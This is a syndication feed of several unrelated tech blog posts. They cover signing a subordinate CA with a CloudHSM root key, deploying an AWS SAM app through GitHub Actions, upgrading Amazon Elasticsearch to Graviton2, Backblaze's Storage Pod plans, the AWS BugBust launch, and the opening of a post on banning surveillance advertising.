  3. To sign the CSR for your subordinate CA with your root CA, using the AWS CloudHSM dynamic engine for OpenSSL, enter the following command:
    openssl x509 -engine cloudhsm -extfile ext.conf -req -in IntermediateCA.csr -CA Root_CA.crt -CAkey Root_CA_FAKE_PEM.key -CAcreateserial -days 3650 -sha256 -out IntermediateCA.crt
    

Importing your signed Subordinate CA Certificate

  1. To import the private CA certificate into ACM Private CA, open a terminal on your Amazon Linux 2 EC2 instance and enter the following command. Replace each user input placeholder with your own information.
    aws acm-pca import-certificate-authority-certificate --certificate-authority-arn arn:aws:acm-pca:region:account:certificate-authority/12345678-1234-1234-1234-123456789012 --certificate file://IntermediateCA.crt --certificate-chain file://Root_CA.crt
    

Shutting down CloudHSM resources

After you import your subordinate CA, it is available for use in ACM Private CA. You can configure the subordinate CA with the same validity period as the root CA, so that you can automate CA certificate management and renewals using ACM without requiring regular access to the root CA. Typically, you will create one or more intermediate issuing CAs with a shorter lifetime that chain up to the subordinate CA.

If you have enabled OCSP or CRL for your CA, you will need to keep your CloudHSM in an active state in order to access the root CA private key for these functions. However, if you have no immediate need to access the root CA, you can safely remove the CloudHSM resources while preserving your AWS CloudHSM cluster’s users, policies, and keys in a CloudHSM cluster backup stored encrypted in Amazon Simple Storage Service (Amazon S3).

To remove the CloudHSM resources

  1. (Optional) If you don’t know the ID of the cluster that contains the HSM that you are deleting, or your HSM IP address, open a terminal on your Amazon Linux 2 EC2 instance and enter the describe-clusters command to find them.
  2. Enter the following command, replacing cluster ID with the ID of the cluster that contains the HSM that you are deleting, and replacing HSM IP address with your HSM IP address.
    aws cloudhsmv2 delete-hsm --cluster-id cluster ID --eni-ip HSM IP address
    

To disable expiration of your automatically generated CloudHSM backup

  1. (Optional) If you don’t know the value for your backup ID, open a terminal on your Amazon Linux 2 EC2 instance and enter the describe-backups command to find it.
  2. Enter the following command, replacing backup ID with the ID of the backup for your cluster.
    aws cloudhsmv2 modify-backup-attributes --backup-id backup ID --never-expires
    

Later, when you do need to access your root CA private key in CloudHSM, create a new HSM in the same cluster; this action restores the backup that was created when you deleted the previous HSM.
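A minimal sketch of that restore step with the AWS CLI; the cluster ID and Availability Zone are placeholders:

# Provision a new HSM in the existing cluster; CloudHSM restores the cluster from its most recent backup
aws cloudhsmv2 create-hsm --cluster-id <cluster ID> --availability-zone us-east-1a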

Depending on your particular needs, you may also want to securely export a copy of the root CA private key to an offsite HSM by using key wrapping. You may need to do this to meet your requirements for managing the CA using another HSM or you may want to copy a cluster backup to a different AWS Region for disaster recovery purposes.

Summary

In this post, I explained an approach to establishing a public key infrastructure (PKI) using AWS Certificate Manager Private Certificate Authority (ACM Private CA) with a portable root CA private key created and managed with AWS CloudHSM. This approach allows you to meet specific requirements for root CA portability that cannot be met by ACM Private CA alone. Before adopting this approach in production, you should carefully consider whether a portable root CA is a requirement for your use case, and review the ACM Private CA guide for Planning a Private CA.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the AWS Certificate Manager forum or contact AWS Support.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

J.D. Bean

J.D. Bean is a Senior Security Specialist Solutions Architect for AWS Strategic Accounts based out of New York City. His interests include security, privacy, and compliance. He is passionate about his work enabling AWS customers’ successful cloud journeys. J.D. holds a Bachelor of Arts from The George Washington University and a Juris Doctor from New York University School of Law.

Using GitHub Actions to deploy serverless applications

Post Syndicated from Julian Wood original https://aws.amazon.com/blogs/compute/using-github-actions-to-deploy-serverless-applications/

This post is written by Gopi Krishnamurthy, Senior Solutions Architect.

Continuous integration and continuous deployment (CI/CD) is one of the major DevOps components. This allows you to build, test, and deploy your applications rapidly and reliably, while improving quality and reducing time to market.

GitHub is an AWS Partner Network (APN) Partner with the AWS DevOps Competency. GitHub Actions is a GitHub feature that allows you to automate tasks within your software development lifecycle. You can use GitHub Actions to run a CI/CD pipeline to build, test, and deploy software directly from GitHub.

The AWS Serverless Application Model (AWS SAM) is an open-source framework for building serverless applications. It provides shorthand syntax to express functions, APIs, databases, and event source mappings. With a few lines per resource, you can define the application you want and model it using YAML.

During deployment, AWS SAM transforms and expands the AWS SAM syntax into AWS CloudFormation syntax, enabling you to build serverless applications faster. The AWS SAM CLI allows you to build, test, and debug applications locally, defined by AWS SAM templates. You can also use the AWS SAM CLI to deploy your applications to AWS. For AWS SAM example code, see the serverless patterns collection.

In this post, you learn how to create a sample serverless application using AWS SAM. You then use GitHub Actions to build and deploy the application in your AWS account.

New GitHub action setup-sam

A GitHub Actions runner is the application that runs a job from a GitHub Actions workflow. You can use a GitHub hosted runner, which is a virtual machine hosted by GitHub with the runner application installed. You can also host your own runners to customize the environment used to run jobs in your GitHub Actions workflows.

AWS has released a GitHub action called setup-sam to install AWS SAM. Although AWS SAM is pre-installed on GitHub-hosted runners, you can use this action to install a specific or the latest AWS SAM version.

This demo uses AWS SAM to create a small serverless application using one of the built-in templates. When the code is pushed to GitHub, a GitHub Actions workflow triggers a GitHub CI/CD pipeline. This builds and deploys your code directly from GitHub to your AWS account.

Prerequisites

  1. A GitHub account: This post assumes you have the required permissions to configure GitHub repositories, create workflows, and configure GitHub secrets.
  2. Create a new GitHub repository and clone it to your local environment. For this example, create a repository called github-actions-with-aws-sam.
  3. An AWS account with permissions to create the necessary resources.
  4. Install AWS Command Line Interface (CLI) and AWS SAM CLI locally. This is separate from using the AWS SAM CLI in a GitHub Actions runner. If you use AWS Cloud9 as your integrated development environment (IDE), AWS CLI and AWS SAM are pre-installed.
  5. Create an Amazon S3 bucket in your AWS account to store the build package for deployment.
  6. An AWS user with access keys, which the GitHub Actions runner uses to deploy the application. The user also requires write access to the S3 bucket.
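For items 5 and 6, the following is a minimal sketch using the AWS CLI; the bucket and user names are placeholders, and you still need to attach IAM policies that allow the deployment (see the credentials section later in this post):

# Create the deployment bucket (bucket names must be globally unique)
aws s3 mb s3://github-actions-sam-deploy-example --region us-east-2

# Create an IAM user for the GitHub Actions runner and generate access keys
aws iam create-user --user-name github-actions-sam
aws iam create-access-key --user-name github-actions-sam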

Creating the AWS SAM application

You can create a serverless application by defining all required resources in an AWS SAM template. AWS SAM provides a number of quick-start templates to create an application.

  1. From the CLI, open a terminal, navigate to the parent of the cloned repository directory, and enter the following:
    sam init -r python3.8 -n github-actions-with-aws-sam --app-template "hello-world"
  2. When asked to select package type (zip or image), select zip.

This creates an AWS SAM application in the root of the repository named github-actions-with-aws-sam, using the default configuration. This consists of a single AWS Lambda Python 3.8 function invoked by an Amazon API Gateway endpoint.

To see additional runtimes supported by AWS SAM and options for sam init, enter sam init -h.

Local testing

AWS SAM allows you to test your applications locally. AWS SAM provides a default event in events/event.json that includes a message body of {"message": "hello world"}.

  1. Invoke the HelloWorldFunction Lambda function locally, passing the default event:
    sam local invoke HelloWorldFunction -e events/event.json

    The function response is:
    {"message": "hello world"}

  2. Test the API Gateway functionality in front of the Lambda function by first starting the API locally:
    sam local start-api

    AWS SAM launches a Docker container with a mock API Gateway endpoint listening on localhost:3000.

  3. Use curl to call the hello API:
    curl http://127.0.0.1:3000/hello

    The API response should be:
    {"message": "hello world"}

Creating the sam-pipeline.yml file

GitHub CI/CD pipelines are configured using a YAML file. This file configures what specific action triggers a workflow, such as push on main, and what workflow steps are required.

In the root of the repository containing the files generated by sam init, create the directory: .github/workflows.

  1. Create a new file called sam-pipeline.yml under the .github/workflows directory.

    sam-pipeline.yml file

  2. Edit the sam-pipeline.yml file and add the following:

    on:
      push:
        branches:
          - main
    jobs:
      build-deploy:
        runs-on: ubuntu-latest
        steps:
          - uses: actions/checkout@v2
          - uses: actions/setup-python@v2
          - uses: aws-actions/setup-sam@v1
          - uses: aws-actions/configure-aws-credentials@v1
            with:
              aws-access-key-id: ${{ secrets.AWS_ACCESS_KEY_ID }}
              aws-secret-access-key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
              aws-region: ##region##
          # sam build
          - run: sam build --use-container

          # Run unit tests - specify unit tests here

          # sam deploy
          - run: sam deploy --no-confirm-changeset --no-fail-on-empty-changeset --stack-name sam-hello-world --s3-bucket ##s3-bucket## --capabilities CAPABILITY_IAM --region ##region##

  3. Replace ##s3-bucket## with the name of the S3 bucket previously created to store the deployment package.
  4. Replace both occurrences of ##region## with your AWS Region.

The configuration triggers the GitHub Actions CI/CD pipeline when code is pushed to the main branch. You can amend this if you are using another branch. For a full list of supported events, refer to the GitHub documentation page.

You can further customize the sam build --use-container command if necessary. By default, the Docker image used to create the build artifact is pulled from Amazon ECR Public. The default Python 3.8 image in this example is based on the language specified during sam init. To pull a different container image, use the --build-image option as specified in the documentation.

The AWS CLI and AWS SAM CLI are installed in the runner using the GitHub action setup-sam. To install a specific version, use the version parameter:

uses: aws-actions/setup-sam@v1
with:
  version: 1.23.0

Configuring AWS credentials in GitHub

The GitHub Actions CI/CD pipeline requires AWS credentials to access your AWS account. The credentials must include AWS Identity and Access Management (IAM) policies that provide access to Lambda, API Gateway, AWS CloudFormation, S3, and IAM resources.

These credentials are stored as GitHub secrets within your GitHub repository, under Settings > Secrets. For more information, see “GitHub Actions secrets”.

In your GitHub repository, create two secrets named AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY and enter the key values. We recommend following IAM best practices for the AWS credentials used in GitHub Actions workflows, including:

  • Do not store credentials in your repository code. Use GitHub Actions secrets to store credentials and redact credentials from GitHub Actions workflow logs.
  • Create an individual IAM user with an access key for use in GitHub Actions workflows, preferably one per repository. Do not use the AWS account root user access key.
  • Grant least privilege to the credentials used in GitHub Actions workflows. Grant only the permissions required to perform the actions in your GitHub Actions workflows.
  • Rotate the credentials used in GitHub Actions workflows regularly.
  • Monitor the activity of the credentials used in GitHub Actions workflows.

Deploying your application

Add all the files to your local git repository, commit the changes, and push to GitHub.

git add .
git commit -am "Add AWS SAM files"
git push

Once the files are pushed to GitHub on the main branch, this automatically triggers the GitHub Actions CI/CD pipeline as configured in the sam-pipeline.yml file.

The GitHub Actions runner performs the pipeline steps specified in the file. It checks out the code from your repo, sets up Python, and configures the AWS credentials based on the GitHub secrets. The runner uses the GitHub action setup-sam to install the AWS SAM CLI.

The pipeline triggers the sam build process to build the application artifacts, using the default container image for Python 3.8.

sam deploy runs to configure the resources in your AWS account using the securely stored credentials.

To view the application deployment progress, select Actions in the repository menu. Select the workflow run and select the job name build-deploy.

GitHub Actions progress

If the build fails, you can view the error message. Common errors are:

  • Incompatible software versions such as the Python runtime being different from the Python version on the build machine. Resolve this by installing the proper software versions.
  • Credentials could not be loaded. Verify that AWS credentials are stored in GitHub secrets.
  • Ensure that your AWS account has the necessary permissions to deploy the resources in the AWS SAM template, in addition to the S3 deployment bucket.

Testing the application

  1. Within the workflow run, expand the Run sam deploy section.
  2. Navigate to the AWS SAM Outputs section. The HelloWorldAPI value shows the API Gateway endpoint URL deployed in your AWS account.
    AWS SAM outputs

  3. Use curl to test the API:
    curl https://<api-id>.execute-api.us-east-1.amazonaws.com/Prod/hello/

    The API response should be:
    {"message": "hello world"}

Cleanup

To remove the application resources, navigate to the CloudFormation console and delete the stack. Alternatively, you can use an AWS CLI command to remove the stack:

aws cloudformation delete-stack --stack-name sam-hello-world

Empty and delete the S3 deployment bucket.
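A minimal sketch with the AWS CLI; the bucket name is a placeholder for the deployment bucket you created earlier:

# Remove all objects and delete the deployment bucket
aws s3 rb s3://github-actions-sam-deploy-example --force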

Conclusion

GitHub Actions is a GitHub feature that allows you to run a CI/CD pipeline to build, test, and deploy software directly from GitHub. AWS SAM is an open-source framework for building serverless applications.

In this post, you used GitHub Actions CI/CD pipeline functionality and AWS SAM to create, build, test, and deploy a serverless application. You used sam init to create a serverless application and tested the functionality locally. You created a sam-pipeline.yml file to define the pipeline steps for GitHub Actions.

The GitHub action setup-sam installed AWS SAM on the GitHub hosted runner. The GitHub Actions workflow uses sam build to create the application artifacts and sam deploy to deploy them to your AWS account.

For more serverless learning resources, visit https://serverlessland.com.

Increase Amazon Elasticsearch Service performance by upgrading to Graviton2

Post Syndicated from Zachariah Elliott original https://aws.amazon.com/blogs/big-data/increase-amazon-elasticsearch-service-performance-by-upgrading-to-graviton2/

Amazon Elasticsearch Service (Amazon ES) supports multiple instance types based on your use case. In 2021, AWS announced general purpose (M6g), compute optimized (C6g), and memory optimized (R6g, R6gd) instance types for Amazon ES version 7.9 or later, powered by AWS Graviton2 processors, which deliver a major leap in capabilities and better price/performance compared to previous generation instances.

Graviton2 instances are built using custom silicon designed by Amazon, incorporating Amazon-designed hardware and software innovations that enable the delivery of efficient, flexible, and secure cloud services with isolated multi-tenancy, private networking, and fast local storage. You can launch Graviton2 instances via the Amazon ES console, the AWS Command Line Interface (AWS CLI), AWS API, AWS CloudFormation, or the AWS Cloud Development Kit (AWS CDK). You can change your existing Amazon ES instance types to Graviton2 using a blue/green deployment process, which minimizes downtime and maintains the original environment in the event of unsuccessful deployments.

In this post, we review prerequisites and considerations to upgrade your existing Amazon ES instances to Graviton2 with minimal downtime.

Why move to Graviton2?

The following are some of the reasons you should move to Graviton2:

  • You can enjoy up to 38% improvement in indexing throughput compared to the corresponding x86-based counterparts
  • The Graviton2 instance family provides up to 50% reduction in indexing latency, and up to 30% improvement in query performance when compared to the current generation (M5, C5, R5)
  • Amazon ES Graviton2 instances provide up to 44% price/performance improvement over previous generation instances
  • Graviton2 instances include support for all recently launched features like encryption at rest and in flight, role-based access control, cross-cluster search, Auto-Tune, Trace Analytics, Kibana Reporting, and UltraWarm

Solution overview

For this post, let’s consider a use case in which we have an Amazon ES cluster running version 7.4 with three data nodes and two primary nodes.

As a general best practice, we recommend testing the process in a non-production environment followed by validation tests to make sure everything is configured and operating as per your expectations before making changes to the production environment. We also recommend creating a snapshot of your cluster before performing upgrades or modifying the instance type to minimize the risk of data loss.

In this post, we walk you through the following steps:

  1. Upgrade the Amazon ES cluster (if needed):
    1. Determine if the current cluster version meets the minimum required version (7.9 or later) for moving to Graviton2.
    2. Upgrade the Amazon ES domain to the required minimum version.
  2. Modify the instance type of your cluster nodes.
  3. Confirm that your applications work correctly with the upgraded cluster.
  4. Roll back to the previous instance types if compatibility issues are discovered.

Upgrade Amazon ES versions

To take advantage of Graviton2-based Amazon ES instances, your cluster must be running Amazon ES version 7.9 and above and service software R20210331 or later (as of this post). For the latest updates of this information, see Supported instance types in Amazon Elasticsearch Service. For upgrade considerations, compatibilities, and instructions, see Upgrading Elasticsearch.

For our use case, our cluster is running version 7.4. We can confirm the version via the AWS CLI or Amazon ES console, as in the following screenshot.

To upgrade your domain, choose Upgrade domain on the Actions menu. You can then choose what version to upgrade to, or verify your cluster can be upgraded. The upgrade process takes some time depending on the size of your cluster.

If you prefer to use the AWS CLI, you can perform the same steps. To get a list of all valid upgrade targets for a current version using the AWS CLI, use the describe-elasticsearch-domain command.

The following describe-elasticsearch-domain example provides configuration details for a given domain:

aws es describe-elasticsearch-domain \
    --domain-name demo

If the cluster version is less than 7.9, use the upgrade-elasticsearch-domain command to upgrade your domain:

aws es upgrade-elasticsearch-domain \
    --domain-name demo \
    --target-version 7.9
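If you only want to verify that the domain is eligible for the upgrade without actually starting it, the same command accepts a check-only flag (a sketch):

# Run the pre-upgrade eligibility check only; no upgrade is started
aws es upgrade-elasticsearch-domain \
    --domain-name demo \
    --target-version 7.9 \
    --perform-check-only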

You can track the progress of the Amazon ES domain upgrade using API calls to Amazon ES. For more information, see Why is my Amazon Elasticsearch Service domain upgrade taking so long?
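For example, a quick way to poll the upgrade status from the AWS CLI:

# Returns the current upgrade step and its status for the domain
aws es get-upgrade-status --domain-name demo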

Modify instances

At the time of writing, you can't mix x86-based and Graviton2-based Amazon ES instances across the primary and data nodes. As such, both the data nodes and primary nodes are modified at the same time. To modify your nodes, complete the following steps (a CLI alternative is shown after the list):

  1. On the Amazon ES console, go to the domain you want to upgrade.
  2. Choose Edit domain.
  3. In the Data nodes section, for Instance type, change your data nodes to Graviton2 instance types. In our case, we upgrade from r5.large.elasticsearch to r6g.large.elasticsearch.
  4. In the Dedicated master nodes section, for Instance type, change your dedicated primary nodes to Graviton2 instance types. In our case, we upgrade from r5.large.elasticsearch to r6g.large.elasticsearch.
  5. Choose Submit.
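If you prefer the AWS CLI, the same change can be made with a single configuration update. The following is a sketch that mirrors the console example above; adjust the domain name, instance types, and counts to your environment:

# Switch both data and dedicated master (primary) nodes to Graviton2 instance types
aws es update-elasticsearch-domain-config \
    --domain-name demo \
    --elasticsearch-cluster-config "InstanceType=r6g.large.elasticsearch,InstanceCount=3,DedicatedMasterEnabled=true,DedicatedMasterType=r6g.large.elasticsearch,DedicatedMasterCount=2"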

The cluster goes into a processing state. During this time, you can monitor the Cluster health tab to see your number of nodes increase. In our case, our cluster has two dedicated primary nodes and three data nodes (five total).

During deployment, Amazon ES performs a blue/green deployment. This ensures any errors encountered during modification can be rolled back. You can continue to use the cluster during this time; however, there may be a brief service interruption when the cluster switches to the new dedicated primary nodes. During the blue/green deployment, you're charged for both instance types; after it completes, you're charged only for the new instance type.

After the modification finishes successfully, you can verify both the primary and data nodes are using Graviton2 instances.

Validate and confirm the application works correctly

You can now validate that Amazon ES is performing as expected with your application. Check the Cluster health tab for metrics related to cluster performance and watch for any metrics that fall short of the performance you expect.
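If you prefer to check from the command line, the standard Elasticsearch APIs remain available on the domain endpoint. The endpoint below is a placeholder; include credentials or request signing as your domain's access policy requires:

# Overall cluster health (status, relocating/initializing shards, and so on)
curl -s 'https://search-demo-xxxxxxxx.us-east-1.es.amazonaws.com/_cluster/health?pretty'

# Per-node view, useful for confirming the new Graviton2 nodes are serving traffic
curl -s 'https://search-demo-xxxxxxxx.us-east-1.es.amazonaws.com/_cat/nodes?v'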

Perform rollback

In the rare scenario in which issues are discovered with the Graviton2-based Amazon ES cluster, such as application compatibility or data issues, you can perform the same steps to change the cluster back to the original node type.

Summary

This post shared a step-by-step guide to migrate your Amazon ES cluster to Graviton2-based nodes, as well as some key considerations when modifying your cluster. We also talked about how to upgrade your cluster to the latest version of Amazon ES to take advantage of Graviton2, as well as other features such as UltraWarm and cold storage. As always, make sure you fully test compatibility with your application and these newer versions of Amazon ES, and per best practices, always perform upgrades in a lower environment before making these changes in a production environment.

Additional resources

For more information, see the following:


About the Authors

Zachariah Elliott works as a Solutions Architect focusing on EdTech at AWS. He is passionate about helping customers build Well-Architected solutions on AWS. He is also part of the IoT Subject Matter Expert community at AWS and loves helping customers develop unique IoT-based solutions.

 

Pranusha Manchala is a Solutions Architect at AWS who works with education companies. She has worked with many EdTech customers and provided them with architectural guidance for building highly scalable and cost-optimized applications on AWS. She found her interests in machine learning and started to dive deep into this technology. She enjoys cooking, baking, and outdoor activities in her free time.

The Next Backblaze Storage Pod

Post Syndicated from original https://www.backblaze.com/blog/next-backblaze-storage-pod/

Backblaze Storage Pod 7?

In September of 2019, we celebrated the 10-year anniversary of open-sourcing the design of our beloved Storage Pods. In that post, we contemplated the next generation Backblaze Storage Pod and outlined some of the criteria we’d be considering as we moved forward with Storage Pod 7.0 or perhaps a third-party vendor.

Since that time, the supply chain for the commodity parts we use continues to reinvent itself, the practice of just-in-time inventory is being questioned, the marketplace for high-density storage servers continues to mature, and the continuing cost effectiveness of scaling the manufacturing and assembly of Storage Pods has proved elusive. A lot has changed.

The Next Storage Pod

As we plan for the next 10 years of providing our customers with astonishingly easy to use cloud storage at a fair price, we need to consider all of these points and more. Follow along as we step through our thought process and let you know what we’re thinking—after all, it’s your data we are storing, and you have every right to know how we plan to do it.

Storage Pod Realities

You just have to look at the bill of materials for Storage Pod 6.0 to know that we use commercially available parts wherever possible. Each Storage Pod has 25 different parts from 15 different manufacturers/vendors, plus the red chassis, and, of course, the hard drives. That’s a trivial number of parts and vendors for a hardware company, but stating the obvious, Backblaze is a software company.

Still, each month we currently build 60 or so new Storage Pods. So, each month we’d need 60 CPUs, 720 SATA cables, 120 power supplies, and so on. Depending on the part, we could order it online or from a distributor or directly from the manufacturer. Even before COVID-19 we found ourselves dealing with parts that would stock out or be discontinued. For example, since Storage Pod 6.0 was introduced, we’ve had three different power supply models be discontinued.

For most of the parts, we actively try to qualify multiple vendors/models whenever we can. But this can lead to building Storage Pods that have different performance characteristics (e.g. different CPUs, different motherboards, and even different hard drives). When you arrange 20 Storage Pods into a Backblaze Vault, you’d like to have 20 systems that are the same to optimize performance. For standard parts like screws, you can typically find multiple sources, but for a unique part like the chassis, you have to arrange an alternate manufacturer.

With COVID-19, the supply chain was very hard to navigate to procure the various components of a Storage Pod. It was normal for purchase orders to be cancelled, items to stock out, shipping dates to slip, and even prices to be renegotiated on the fly. Our procurement team was on top of this from the beginning, and we got the parts we needed. Still, it was a challenge as many sources were limiting capacity and shipping nearly everything they had to their larger customers like Dell and Supermicro, who were first in line.

A visual representation of how crazy the supply chain is.
Supply chain logistics aren’t getting less interesting.

Getting Storage Pods Built

When we first introduced Storage Pods, we were the only ones who built them. We would have the chassis constructed and painted, then we’d order all the parts and assemble the units at our data center. We built the first 20 or so this way. At that point, we decided to outsource the assembly process to a contract manufacturer. They would have a sheet metal fabricator construct and paint the chassis, and the contract manufacturer would order and install all the parts. The complete Storage Pod was then shipped to us for testing.

Over the course of the last 12 years, we’ve had multiple contract manufacturers. Why? There are several reasons, but they start with the fact that building 20, 40, or even 60 Storage Pods a month is not a lot of work for most contract manufacturers—perhaps five days a month at most. If they dedicate a line to Storage Pods, that’s a lot of dead time for the line. Yet, Storage Pod assembly doesn’t lend itself to being flexed into a line very well, as the Storage Pods are bulky and the assembly process is fairly linear versus modular.

an array of parts that get assembled to create a storage pod

In addition, we asked the contract manufacturers to acquire and manage the Storage Pod parts. For a five-day-a-month project, their preferred process is to have enough parts on hand for each monthly run. But we liked to buy in bulk to lower our cost, and some parts like backplanes had high minimum order quantities. This meant someone had to hold inventory. Over time, we took on more and more of this process, until we were ordering all the parts and having them shipped to the contract manufacturer monthly to be assembled. It didn’t end there.

As noted above, when the COVID-19 lockdown started, supply chain and assembly processes were hard to navigate. As a consequence, we started directing some of the fabricated Storage Pod chassis to be sent to us for assembly and testing. This hybrid assembly model got us back in the game of assembling Storage Pods—we had gone full circle. Yes, we are control freaks when it comes to our Storage Pods. That was a good thing when we were the only game in town, but a lot has changed.

The Marketplace Catches Up

As we pointed out in the 10-year anniversary Storage Pod post, there are plenty of other companies that are making high-density storage servers like our Storage Pod. At the time of that post, the per unit cost was still too high. That’s changed, and today high-density storage servers are generally cost competitive. But unit cost is only part of the picture as some of the manufacturers love to bundle services into the final storage server you receive. Some services are expected, like maintenance coverage, while others—like the requirement to only buy hard drives from them at a substantial markup—are non-starters. Still, over the next 10 years, we need to ensure we have the ability to scale our data centers worldwide and to be able to maintain the systems within. At the same time, we need to ensure that the systems are operational and available to meet or exceed our expectations and those of our customers, as well.

The Amsterdam Data Center

As we contemplated opening our data center in Amsterdam, we had a choice to make: use Storage Pods or use storage servers from another vendor. We considered shipping the 150-pound Storage Pods to Amsterdam or building them there as options. Both were possible, but each had their own huge set of financial and logistical hurdles along the way. The most straightforward path to get storage servers to the Amsterdam data center turned out to be Dell.

The process started by testing out multiple storage server vendors in our Phoenix data center. There is an entire testing process we have in place, which we’ll cover in another post, but we can summarize by saying the winning platform needed to be at least as performant and stable as our Storage Pods. Dell was the winner and from there we ordered two Backblaze Vaults worth of Dell servers for the Amsterdam data center.

The servers were installed, our data center techs were trained, repair metrics were established and tracked, and the systems went live. Since that time, we added another six Backblaze Vaults worth of servers. Overall, it has been a positive experience for everyone involved—not perfect, but filled with learnings we can apply going forward.

By the way, Dell was kind enough to make red Backblaze bezels for us, which we install on each of the quasi-Storage Pods. They charge us extra for them, of course, but some things are just worth it.

Backblaze Dell Server Face Plates
Faceplate on the quasi-Storage Pod.

Lessons Learned

The past couple of years, including COVID, have taught us a number of lessons we can take forward:

  1. We can use third-party storage servers to reliably deliver our cloud storage services to our customers.
  2. We don’t have to do everything. We can work with those vendors to ensure the equipment is maintained and serviced in a timely manner.
  3. We deepened our appreciation of having multiple sources/vendors for the hardware we use.
  4. We can use multiple third-party vendors to scale quickly, even if storage demand temporarily outpaces our forecasts.

Those points, taken together, have opened the door to using storage servers from multiple vendors. When we built our own Storage Pods, we achieved our cost savings from innovation and the use of commodity parts. We were competing against ourselves to lower costs. By moving forward with non-Backblaze storage servers, we will have the opportunity for the marketplace to compete for our business.

Are Storage Pods Dead?

Right after we introduced Storage Pod 1.0 to the world, we had to make a decision as to whether or not to make and sell Storage Pods in addition to our cloud-based services. We did make and sell a few Storage Pods—we needed the money—but we eventually chose software. We also decided to make our software hardware-agnostic. We could run on any reasonably standard storage server, so now that storage server vendors are delivering cost-competitive systems, we can use them with little worry.

So the question is: Will there ever be a Storage Pod 7.0 and beyond? We want to say yes. We’re still control freaks at heart, meaning we’ll want to make sure we can make our own storage servers so we are not at the mercy of “Big Server Inc.” In addition, we do see ourselves continuing to invest in the platform so we can take advantage of and potentially create new, yet practical ideas in the space (Storage Pod X anyone?). So, no, we don’t think Storage Pods are dead, they’ll just have a diverse group of storage server friends to work with.

Storage Pod Fun

Over the years we had some fun with our Storage Pods. Here are a few of our favorites.

Storage Pod Dominos: That’s all that needs to be said.

Building the Big “B”: How to build a “B” out of Storage Pods.

Crushing Storage Pods: Megabot meets Storage Pod, destruction ensues.

Storage Pod Museum: We saved all the various versions of Storage Pods.

Storage Pod Giveaway: Interviews from the day we gave away 200 Storage Pods.

Pick a Faceplate: We held a contest to let our readers choose the next Backblaze faceplate design.

The post The Next Backblaze Storage Pod appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

New – AWS BugBust: It’s Game Over for Bugs

Post Syndicated from Martin Beeby original https://aws.amazon.com/blogs/aws/new-aws-bugbust-its-game-over-for-bugs/

Today, we are launching AWS BugBust, the world’s first global challenge to fix one million bugs and reduce technical debt by over $100 million.

You might have participated in a bug bash before. Many of the software companies where I’ve worked (including Amazon) run them in the weeks before launching a new product or service. AWS BugBust takes the concept of a bug bash to a new level.

AWS BugBust allows you to create and manage private events that will transform and gamify the process of finding and fixing bugs in your software. It includes automated code analysis, built-in leaderboards, custom challenges, and rewards. AWS BugBust fosters team building and introduces some friendly competition into improving code quality and application performance. What’s more, your developers can take part in the world’s largest code challenge, win fantastic prizes, and receive kudos from their peers.

Behind the scenes, AWS BugBust uses Amazon CodeGuru Reviewer and Amazon CodeGuru Profiler. These developer tools use machine learning and automated reasoning to find bugs in your applications. These bugs are then available for your developers to claim and fix. The more bugs a developer fixes, the more points the developer earns. A traditional bug bash requires developers to find and fix bugs manually. With AWS BugBust, developers get a list of bugs before the event begins so they can spend the entire event focused on fixing them.

Fix Your Bugs and Earn Points
As a developer, each time you fix a bug in a private event, points are allocated and added to the global leaderboard. Don’t worry: Only your handle (profile name) and points are displayed on the global leaderboard. Nobody can see your code or details about the bugs that you’ve fixed.

As developers reach significant individual milestones, they receive badges and collect exclusive prizes from AWS. For example, if they achieve 100 points, they win an AWS BugBust T-shirt, and if they earn 2,000 points, they win an AWS BugBust Varsity Jacket. In addition, on the 30th of September 2021, the top 10 developers on the global leaderboard will receive a ticket to AWS re:Invent.

Create an Event
To show you how the challenge works, I’ll create a private AWS BugBust event. In the CodeGuru console, I choose Create BugBust event.

Under Step 1- Rules and scoring, I see how many points are awarded for each type of bug fix. Profiling groups are used to determine performance improvements after the players submit their improved solutions.

In Step 2, I sign in to my player account. In Step 3, I add event details like name, description, and start and end time.

I also enter details about the first-, second-, and third-place prizes. This information will be displayed to players when they join the event.

After I have reviewed the details and created the event, my event dashboard displays essential information. From the dashboard, I can also import work items and invite players.

I select the Import work items button. This takes me to the Import work items screen where I choose to Import bugs from CodeGuru Reviewer and profiling groups from CodeGuru Profiler. I choose a repository analysis from my account and AWS BugBust imports all the identified bugs for players to claim and fix. I also choose several profiling groups that will be used by AWS BugBust.
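The repository analyses and profiling groups have to exist in your account before you can import them into an event. If you haven't set them up yet, the following is a sketch of the standard CodeGuru CLI setup; the repository and profiling group names are placeholders (a CodeCommit repository is shown, and other providers are associated in a similar way):

# Associate a repository so CodeGuru Reviewer can analyze it and surface bugs
aws codeguru-reviewer associate-repository \
    --repository 'CodeCommit={Name=my-demo-repo}'

# Create a profiling group for CodeGuru Profiler to collect runtime performance data
aws codeguruprofiler create-profiling-group \
    --profiling-group-name my-demo-profiling-group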

Now that my event is ready, I can invite players. Players can now sign into a player portal using their player accounts and start claiming and fixing bugs.

Things to Know
Amazon CodeGuru currently supports Python and Java. To compete in the global challenge, your project must be written in one of these languages.

Pricing
When you create your first AWS BugBust event, all costs incurred by the underlying usage of Amazon CodeGuru Reviewer and Amazon CodeGuru Profiler are free of charge for 30 days per AWS account. This 30 day free period applies even if you have already utilized the free tiers for Amazon CodeGuru Reviewer and Amazon CodeGuru Profiler. You can create multiple AWS BugBust events within the 30-day free trial period. After the 30-day free trial expires, you will be charged for Amazon CodeGuru Reviewer and Amazon CodeGuru Profiler based on your usage in the challenge. See the Amazon CodeGuru Pricing page for details.

Available Today
Starting today, you can create AWS BugBust events in the Amazon CodeGuru console in the US East (N. Virginia) Region. Start planning your AWS BugBust today.

— Martin

Banning Surveillance-Based Advertising

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/06/banning-surveillance-based-advertising.html

The Norwegian Consumer Council just published a fantastic new report: “Time to Ban Surveillance-Based Advertising.” From the Introduction:

The challenges caused and entrenched by surveillance-based advertising include, but are not limited to:

  • privacy and data protection infringements
  • opaque business models
  • manipulation and discrimination at scale
  • fraud and other criminal activity
  • serious security risks

In the following chapters, we describe various aspects of these challenges and point out how today’s dominant model of online advertising is a threat to consumers, democratic societies, the media, and even to advertisers themselves. These issues are significant and serious enough that we believe that it is time to ban these detrimental practices.

